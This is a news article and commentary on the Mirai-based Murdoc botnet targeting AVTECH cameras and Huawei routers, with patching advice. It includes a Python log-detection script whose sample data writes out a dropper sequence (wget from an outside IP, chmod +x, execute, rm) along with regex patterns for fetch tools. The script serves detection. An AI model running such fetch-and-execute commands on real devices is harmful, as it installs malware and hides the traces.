2025-01-22
The cybersecurity landscape is constantly evolving, with threat actors developing increasingly sophisticated methods to exploit vulnerabilities in connected devices. One such emerging threat is the Murdoc Botnet, a new variant of the infamous Mirai malware family. Recently uncovered by the Qualys Threat Research Unit, this botnet specifically targets vulnerabilities in AVTECH IP cameras and Huawei HG532 routers, posing a significant risk to IoT ecosystems worldwide.
Since its discovery in July 2024, the Murdoc Botnet has already infected over 1,300 systems, with the majority of victims located in Malaysia, Thailand, Mexico, and Indonesia. The botnet leverages known exploits, such as CVE-2024-7029 and CVE-2017-17215, to propagate its malicious payloads. Researchers have identified more than 100 servers actively distributing Mirai malware and communicating with compromised devices, indicating that the campaign is still ongoing.
The Murdoc Botnet employs a multi-stage attack mechanism. It uses command-line injection to fetch, execute, and remove shell scripts on targeted AVTECH cameras. Over 500 samples containing ELF and shell script files have been discovered, highlighting the botnet’s focus on IoT devices. The shell script utilizes GTFOBins to fetch the payload, grant execution permissions, execute it, and then remove traces of the attack.
This botnet is not an isolated threat. Recently, the Mirai-based Gayfemboy botnet was observed exploiting over 20 vulnerabilities, including CVE-2024-12856 in Four-Faith industrial routers and several unknown vulnerabilities in Neterbit and Vimar devices. These attacks underscore the growing trend of threat actors targeting IoT devices, which often lack robust security measures.
As IoT adoption continues to rise, so does the risk of large-scale botnet attacks. Organizations and individuals must prioritize securing their devices by applying patches, changing default credentials, and monitoring network traffic for unusual activity.
What Undercode Says:
The emergence of the Murdoc Botnet is a stark reminder of the vulnerabilities inherent in IoT devices. While the convenience and functionality of connected devices have revolutionized industries, their security often lags behind. The Murdoc Botnet’s exploitation of known vulnerabilities, such as CVE-2024-7029 and CVE-2017-17215, highlights the critical need for timely patch management and proactive security measures.
One of the most concerning aspects of this botnet is its ability to propagate through command-line injection and shell scripts. This technique allows the malware to execute payloads on compromised devices while evading detection by removing traces of its activity. The use of GTFOBins further complicates mitigation efforts, as it enables the botnet to bypass traditional security controls.
The geographic distribution of infected systems—primarily in Malaysia, Thailand, Mexico, and Indonesia—suggests that the attackers are targeting regions with high IoT adoption but potentially weaker cybersecurity infrastructure. This trend is not new; threat actors often focus on areas where they can maximize their impact with minimal resistance.
The Murdoc
Moreover, the overlap between the Murdoc Botnet and the Gayfemboy botnet highlights the evolving tactics of cybercriminals. By exploiting a wide range of vulnerabilities, including zero-day exploits, these botnets demonstrate the increasing sophistication of IoT-targeted attacks. The use of Telnet weak credentials further underscores the importance of strong authentication mechanisms.
To combat these threats, organizations must adopt a multi-layered security approach. This includes:
1. Regularly updating firmware and software to patch known vulnerabilities.
2. Changing default credentials on IoT devices to prevent brute-force attacks.
3. Implementing network segmentation to isolate IoT devices from critical systems.
4. Monitoring network traffic for unusual patterns that may indicate a compromise.
5. Collaborating with cybersecurity researchers to stay informed about emerging threats.
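The fetch, chmod, execute, remove sequence described earlier, together with the monitoring called for in step 4, can be turned into a simple ordered-stage detection. The following is an added example (not code from the article or from Qualys), in Python, run over constructed command-audit lines in an assumed "<ts> <host> cmd=<command>" format; it flags a host only when all four stages occur in order against the same downloaded file.

```python
import re

# Constructed sample input (not real telemetry): command-execution audit lines
# as an IoT gateway might forward them. Assumed format: "<ts> <host> cmd=<command>".
SAMPLE_LOG = """\
2025-01-20T10:01:02Z cam-17 cmd=wget http://198.51.100.7/x.sh -O /tmp/x.sh
2025-01-20T10:01:03Z cam-17 cmd=chmod +x /tmp/x.sh
2025-01-20T10:01:03Z cam-17 cmd=sh /tmp/x.sh
2025-01-20T10:01:05Z cam-17 cmd=rm -f /tmp/x.sh
2025-01-20T10:02:00Z cam-22 cmd=wget http://203.0.113.9/fw.bin -O /tmp/fw.bin
2025-01-20T10:02:01Z cam-22 cmd=ls -l /tmp/fw.bin
"""

# The four stages the article describes, in the order they must occur on one host.
STAGES = (
    ("fetch",  re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")),
    ("chmod",  re.compile(r"\bchmod\b\s+(?:[ugoa]*\+[rw]*x|[0-7]*[1357]\b)")),
    ("exec",   re.compile(r"(?:^|\s)(?:(?:ba|a)?sh\b|\./)|^/")),
    ("remove", re.compile(r"\brm\b")),
)
# Absolute local paths; the lookbehind skips "/" inside URLs such as http://host/x.sh.
ABS_PATH = re.compile(r"(?<![\w:/])/[\w./-]+")


def staged_path(cmd: str) -> str:
    """Return the local file a fetch command writes (last absolute path), or ""."""
    paths = ABS_PATH.findall(cmd)
    return paths[-1] if paths else ""


def find_dropper_chains(log_text: str) -> list[tuple[str, str]]:
    """Return (host, path) for each host that completes fetch -> chmod -> exec -> rm."""
    progress: dict[str, tuple[int, str]] = {}   # host -> (next stage index, file)
    alerts: list[tuple[str, str]] = []
    for line in log_text.splitlines():
        if " cmd=" not in line:
            continue                              # not a command record
        meta, cmd = line.split(" cmd=", 1)
        host = meta.split()[1]
        idx, path = progress.get(host, (0, ""))
        _, pattern = STAGES[idx]
        if idx == 0:                              # waiting for a download
            if pattern.search(cmd) and (path := staged_path(cmd)):
                progress[host] = (1, path)
            continue
        if pattern.search(cmd) and path in cmd:   # next stage, same file
            progress[host] = (idx + 1, path)
            if idx + 1 == len(STAGES):            # chain complete: alert and reset
                alerts.append((host, progress.pop(host)[1]))
    return alerts
```

A host that only downloads a file (cam-22 in the sample) is not flagged, which keeps firmware updates and ordinary file transfers out of the alert list.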
The rise of botnets like Murdoc and Gayfemboy serves as a wake-up call for the IoT industry. As connected devices become more integrated into our daily lives, the stakes for securing them have never been higher. By addressing these challenges head-on, we can mitigate the risks and ensure a safer digital future.
In conclusion, the Murdoc Botnet is a potent reminder of the vulnerabilities in IoT ecosystems and the need for robust cybersecurity practices. As threat actors continue to innovate, staying vigilant and proactive is the key to defending against these ever-evolving threats.
References:
Reported By: Securityaffairs.com